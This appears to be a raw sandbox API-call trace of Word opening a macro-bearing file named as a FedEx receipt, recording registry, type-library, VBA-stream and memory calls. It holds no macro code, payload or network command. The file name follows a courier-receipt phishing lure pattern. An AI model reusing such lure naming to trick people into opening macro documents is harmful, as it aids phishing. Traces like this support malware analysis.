0x0 [0041.068] wcscpy_s (in: _Destination=0x186050, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0041.068] RegOpenKeyW (in: hKey=0xa02, lpSubKey="2.0", phkResult=0x1860f8 | out: phkResult=0x1860f8*=0xa0a) returned 0x0 [0041.068] _ultoa_s (in: _Val=0x0, _DstBuf=0x186070, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0041.068] RegOpenKeyA (in: hKey=0xa0a, lpSubKey="0", phkResult=0x186060 | out: phkResult=0x186060*=0xa12) returned 0x0 [0041.069] RegOpenKeyW (in: hKey=0xa12, lpSubKey="win64", phkResult=0x186068 | out: phkResult=0x186068*=0xa1a) returned 0x0 [0041.069] RegCloseKey (hKey=0xa1a) returned 0x0 [0041.069] RegCloseKey (hKey=0xa12) returned 0x0 [0041.069] _ultow_s (in: _Value=0x0, _Buffer=0x186100, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.069] RegOpenKeyW (in: hKey=0xa0a, lpSubKey="0", phkResult=0x1860d8 | out: phkResult=0x1860d8*=0xa0e) returned 0x0 [0041.070] RegQueryValueW (in: hKey=0xa0e, lpSubKey="win64", lpData=0x186120, lpcbData=0x1860d4 | out: lpData="C:\\Windows\\system32\\FM20.DLL", lpcbData=0x1860d4) returned 0x0 [0041.070] wcscpy_s (in: _Destination=0x6ad5eb0, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\FM20.DLL" | out: _Destination="C:\\Windows\\system32\\FM20.DLL") returned 0x0 [0041.070] RegCloseKey (hKey=0xa0e) returned 0x0 [0041.070] RegCloseKey (hKey=0xa0a) returned 0x0 [0041.070] RegCloseKey (hKey=0xa02) returned 0x0 [0041.070] RegCloseKey (hKey=0x9f2) returned 0x0 [0041.071] LoadTypeLib (in: szFile="C:\\Windows\\system32\\FM20.DLL", pptlib=0x186748*=0x0 | out: pptlib=0x186748*=0x6993ed0) returned 0x0 [0041.144] IUnknown:QueryInterface (in: This=0x6993ed0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186548 | out: ppvObject=0x186548*=0x0) returned 0x80004002 [0041.144] ITypeLib:RemoteGetLibAttr (in: This=0x6993ed0, ppTLibAttr=0x186540, pDummy=0x10 | out: ppTLibAttr=0x186540, pDummy=0x10) returned 0x0 [0041.144] ITypeLib:RemoteGetDocumentation (in: This=0x6993ed0, index=-1, refPtrFlags=0x0, pbstrName=0x186538, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6c1dd16 | out: pbstrName=0x186538*="Microsoft Forms 2.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6c1dd16) returned 0x0 [0041.144] StringFromGUID2 (in: rguid=0x68f0a50*(Data1=0xd452ee1, Data2=0xe08f, Data3=0x101a, Data4=([0]=0x85, [1]=0x2e, [2]=0x2, [3]=0x60, [4]=0x8c, [5]=0x4d, [6]=0xb, [7]=0xb4)), lpsz=0x186560, cchMax=39 | out: lpsz="{0D452EE1-E08F-101A-852E-02608C4D0BB4}") returned 39 [0041.144] _ultow_s (in: _Value=0x2, _Buffer=0x1864aa, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0041.144] _ultow_s (in: _Value=0x0, _Buffer=0x1864ae, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.144] _ultow_s (in: _Value=0x0, _Buffer=0x1864b2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.144] wcscpy_s (in: _Destination=0x6c1ddb8, _SizeInWords=0x70, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0041.144] wcscpy_s (in: _Destination=0x6c1ddbe, _SizeInWords=0x6d, _Source="{0D452EE1-E08F-101A-852E-02608C4D0BB4}" | out: _Destination="{0D452EE1-E08F-101A-852E-02608C4D0BB4}") returned 0x0 [0041.144] wcscpy_s (in: _Destination=0x6c1de0a, _SizeInWords=0x47, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0041.144] wcscpy_s (in: _Destination=0x6c1de18, _SizeInWords=0x40, _Source="C:\\Windows\\system32\\FM20.DLL" | out: _Destination="C:\\Windows\\system32\\FM20.DLL") returned 0x0 [0041.144] wcscpy_s (in: _Destination=0x6c1de52, _SizeInWords=0x23, _Source="Microsoft Forms 2.0 Object Library" | out: _Destination="Microsoft Forms 2.0 Object Library") returned 0x0 [0041.144] ITypeLib:LocalReleaseTLibAttr (This=0x6993ed0) returned 0x0 [0041.144] wcscpy_s (in: _Destination=0x6ad5eb0, _SizeInWords=0x104, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.144] wcscpy_s (in: _Destination=0x6c69408, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.144] IMalloc:Free (This=0x7feffc15380, pv=0x6ad5eb0) [0041.144] IUnknown:AddRef (This=0x6993ed0) returned 0x2 [0041.144] IUnknown:QueryInterface (in: This=0x6993ed0, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1867a8 | out: ppvObject=0x1867a8*=0x0) returned 0x80004002 [0041.144] IUnknown:Release (This=0x6993ed0) returned 0x1 [0041.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSForms", cchWideChar=8, lpMultiByteStr=0x186730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSForms", lpUsedDefaultChar=0x0) returned 8 [0041.144] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MSForms") returned 0x100f43 [0041.144] strcpy_s (in: _Dst=0x186510, _DstSize=0x8, _Src="MSForms" | out: _Dst="MSForms") returned 0x0 [0041.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186510, cbMultiByte=8, lpWideCharStr=0x186360, cchWideChar=8 | out: lpWideCharStr="MSForms") returned 8 [0041.144] IUnknown:AddRef (This=0x6990960) returned 0x3 [0041.144] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x186430, pBstrLibName=0x186360 | out: pfName=0x186430*=0, pBstrLibName=0x186360) returned 0x0 [0041.144] IUnknown:Release (This=0x6990960) returned 0x2 [0041.145] IUnknown:AddRef (This=0x6992850) returned 0x3 [0041.145] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x186430, pBstrLibName=0x186360 | out: pfName=0x186430*=0, pBstrLibName=0x186360) returned 0x0 [0041.145] IUnknown:Release (This=0x6992850) returned 0x2 [0041.145] IUnknown:AddRef (This=0x6992df0) returned 0x4 [0041.145] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x186430, pBstrLibName=0x186360 | out: pfName=0x186430*=0, pBstrLibName=0x186360) returned 0x0 [0041.145] IUnknown:Release (This=0x6992df0) returned 0x3 [0041.145] IUnknown:AddRef (This=0x6992580) returned 0x2 [0041.145] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x186430, pBstrLibName=0x186360 | out: pfName=0x186430*=0, pBstrLibName=0x186360) returned 0x0 [0041.145] IUnknown:Release (This=0x6992580) returned 0x1 [0041.145] IUnknown:AddRef (This=0x6993ed0) returned 0x2 [0041.145] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x186430, pBstrLibName=0x186360 | out: pfName=0x186430*=0, pBstrLibName=0x186360) returned 0x0 [0041.145] IUnknown:Release (This=0x6993ed0) returned 0x1 [0041.145] IMalloc:Alloc (This=0x7feffc15380, cb=0x48) returned 0x6b84f50 [0041.145] IMalloc:Free (This=0x7feffc15380, pv=0x6ad2340) [0041.145] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ea180 [0041.145] IMalloc:Realloc (This=0x7feffc15380, pv=0x68ea180, cb=0x74) returned 0x6c10780 [0041.145] IMalloc:Free (This=0x7feffc15380, pv=0x6b84f50) [0041.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x186580, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.146] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1866c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.146] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.146] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a470, cb=0x8) returned 0x6c13f90 [0041.146] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9ee90 [0041.146] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b9ee90) returned 0x80 [0041.146] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d520 [0041.146] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d6a0 [0041.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x186580, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.146] CoCreateGuid (in: pguid=0x1862b0 | out: pguid=0x1862b0*(Data1=0x2652ddd3, Data2=0x5060, Data3=0x4bd8, Data4=([0]=0x97, [1]=0x35, [2]=0xb9, [3]=0x36, [4]=0x48, [5]=0x27, [6]=0xe6, [7]=0xd1))) returned 0x0 [0041.146] CoCreateGuid (in: pguid=0x1862c0 | out: pguid=0x1862c0*(Data1=0x83ac56a4, Data2=0x5b81, Data3=0x45e1, Data4=([0]=0xa1, [1]=0x58, [2]=0xf, [3]=0x61, [4]=0x2b, [5]=0xdc, [6]=0xb, [7]=0x61))) returned 0x0 [0041.146] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1862d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.146] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.147] GetLocalTime (in: lpSystemTime=0x1861a8 | out: lpSystemTime=0x1861a8*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x27c)) [0041.147] _ultow_s (in: _Value=0x5de83298, _Buffer=0x6c68fb4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0041.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015de83298", cchWideChar=11, lpMultiByteStr=0x186140, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015de83298", lpUsedDefaultChar=0x0) returned 11 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x170) returned 0x6ba8c00 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x50) returned 0x6a67140 [0041.147] strcpy_s (in: _Dst=0x6a7c1e8, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0041.147] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a370, cb=0x68) returned 0x6ad2340 [0041.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.147] wcscpy_s (in: _Destination=0x6c690a0, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0041.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.147] wcscpy_s (in: _Destination=0x6c690c0, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0041.147] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a3a0, cb=0x12) returned 0x6b27dc0 [0041.147] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a2e0, cb=0x6) returned 0x6b0a3a0 [0041.147] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x54) returned 0x6a671a0 [0041.147] IMalloc:Free (This=0x7feffc15380, pv=0x6c10780) [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ea180 [0041.147] IMalloc:Realloc (This=0x7feffc15380, pv=0x68ea180, cb=0x80) returned 0x6b9efb0 [0041.147] IMalloc:Free (This=0x7feffc15380, pv=0x6a671a0) [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x3d0) returned 0x6c6f800 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ea180 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c31f10 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f040 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a2e0 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a370 [0041.147] IMalloc:Alloc (This=0x7feffc15380, cb=0x688) returned 0x6c8a230 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f0d0 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x640) returned 0x69d64b0 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ea150 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a470 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fa0 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ea0f0 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f160 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x400) returned 0x3e41240 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x400) returned 0x3e41650 [0041.148] IMalloc:Alloc (This=0x7feffc15380, cb=0x400) returned 0x3e41a60 [0041.148] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0041.148] strcpy_s (in: _Dst=0x186310, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0041.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186310, cbMultiByte=10, lpWideCharStr=0x186160, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0041.148] IUnknown:AddRef (This=0x6990960) returned 0x3 [0041.148] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x186230, pBstrLibName=0x186160 | out: pfName=0x186230*=0, pBstrLibName=0x186160) returned 0x0 [0041.148] IUnknown:Release (This=0x6990960) returned 0x2 [0041.148] IUnknown:AddRef (This=0x6992850) returned 0x3 [0041.148] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x186230, pBstrLibName=0x186160 | out: pfName=0x186230*=0, pBstrLibName=0x186160) returned 0x0 [0041.148] IUnknown:Release (This=0x6992850) returned 0x2 [0041.148] IUnknown:AddRef (This=0x6992df0) returned 0x4 [0041.148] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x186230, pBstrLibName=0x186160 | out: pfName=0x186230*=0, pBstrLibName=0x186160) returned 0x0 [0041.148] IUnknown:Release (This=0x6992df0) returned 0x3 [0041.148] IUnknown:AddRef (This=0x6992580) returned 0x2 [0041.148] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x186230, pBstrLibName=0x186160 | out: pfName=0x186230*=1, pBstrLibName=0x186160) returned 0x0 [0041.149] IUnknown:Release (This=0x6992580) returned 0x1 [0041.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Evaluate", cchWideChar=-1, lpMultiByteStr=0x186310, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Evaluate", lpUsedDefaultChar=0x0) returned 10 [0041.149] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0041.149] wcsncpy_s (in: _Destination=0x186320, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0041.149] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0041.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186250, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0041.149] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0041.149] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0041.149] CExposedDocFile::AddRef () returned 0x3 [0041.149] CExposedDocFile::AddRef () returned 0x4 [0041.149] CExposedDocFile::OpenStream () returned 0x0 [0041.149] CExposedDocFile::Release () returned 0x3 [0041.149] CExposedStream::Seek () returned 0x0 [0041.149] CExposedStream::AddRef () returned 0x2 [0041.149] CExposedStream::Read () returned 0x0 [0041.149] IMalloc:Alloc (This=0x7feffc15380, cb=0x2028) returned 0x6c92200 [0041.149] IMalloc:Alloc (This=0x7feffc15380, cb=0x10020*=0x10128) returned 0x6c94230 [0041.150] CExposedStream::AddRef () returned 0x3 [0041.150] CExposedStream::Release () returned 0x2 [0041.150] IMalloc:Alloc (This=0x7feffc15380, cb=0x2ee0) returned 0x6ca4260 [0041.150] IMalloc:Alloc (This=0x7feffc15380, cb=0x800) returned 0x66e9470 [0041.150] CExposedStream::Read () returned 0x0 [0041.151] CExposedStream::Read () returned 0x0 [0041.151] IMalloc:Alloc (This=0x7feffc15380, cb=0x404) returned 0x3e41e70 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x85", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.151] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa0", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa1", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa2", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa3", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa4", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa5", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa6", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa7", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa8", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa9", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xaa", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xab", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xac", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xad", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xae", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xaf", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb0", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb1", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb2", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb3", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb4", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 